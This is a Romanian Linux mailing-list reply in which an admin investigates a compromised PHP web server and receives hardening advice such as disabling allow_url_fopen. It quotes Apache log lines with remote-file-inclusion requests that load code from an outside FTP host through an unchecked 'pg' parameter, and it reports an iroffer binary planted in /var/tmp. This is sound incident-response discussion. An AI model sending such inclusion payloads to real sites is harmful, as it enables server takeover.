Re: [rlug] ce vulnerabilitate e asta ?

mihaivt Tue, 22 Jan 2008 05:16:50 -0800

On Tue, 22 Jan 2008 08:18:46 +0200
Emil Sirbu wrote:

> 
> > Am incercat tot ce am putut fara reinstall (updates, audit), dar
> > serverul web trebuia sa fie rapid up asa ca i-am dat drumul din nou
> > urmand sa fac investigatii a doua zi
> >
> > A doua zi ... din nou:
> >   
> ia verifica "cron"-ul lui apache
> 
> Dupa ce scapi de goanga, asa cum s-a mai spus, (macar) seteaza in
> php.ini
> 
> allow_url_fopen = off
> 
> 
> si cauta prin scripturile alea  un include/require ce contine $_GET /
> $_POST / $_REQUEST / ... in numele fisierului (daca ai
> register_globals = On  va tb. sa iei toate liniile include/require ce
> contin un nume de variabila la mana)
>



multumesc tuturor celor care mi-au raspuns. In prima zi cand am
observat buba am verificat de cand timp era pornit procesul suspect, am
aflat astfel ora de incepere si apoi m-am uitat in logul apache la ora 
rspectiva

 [xx/Jan/2008:03:43:16 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"libwww-perl/5.805"
 [xx/Jan/2008:03:43:23 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"Mozilla/5.0"
 [xx/Jan/2008:03:51:39 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"libwww-perl/5.805"
 [xx/Jan/2008:03:51:46 +0200] "GET 
/index.php?pg=ftp://80.50.253.90/upload/trop/old? HTTP/1.1" 200 13360 "-" 
"Mozilla/5.0"

Am vazut chestiile de mai sus si am banuit ca ma foloseste pe post de
proxy. Am incercat insa si eu ceva de genul asta
index.php?pg=http://site.unde.am.acces
Stateam cu tcpdump pe site.unde.am.acces si vroaim sa vad daca imi vine
trafic de la site compromis. Nu venea asa ca am considerat ca chestia
cu index.php?pg=http://blabla a fost doar o tentativa nereusita. Se
pare totusi ca m-am inselat. M-am uitat mai atent in script php si
variabila $_REQUEST['pg'] era preluat fara prea multe verificari si mestecata
apoi fara grija de restul scriptului php. Am trimis problema la
webmaster.

Am gasit in /var/tmp/ executabilul iroffer cu owner apache

iroffer is a software program that acts as a fileserver for IRC. It is
similar to a FTP server or WEB server, but users can download files
using the DCC protocol of IRC instead of a web browser.

Probabil ca prin asta isi aducea mai departe ce dorea.


_______________________________________________
RLUG mailing list
[email protected]
http://lists.lug.ro/mailman/listinfo/rlug

Re: [rlug] ce vulnerabilitate e asta ?

Raspunde prin e-mail lui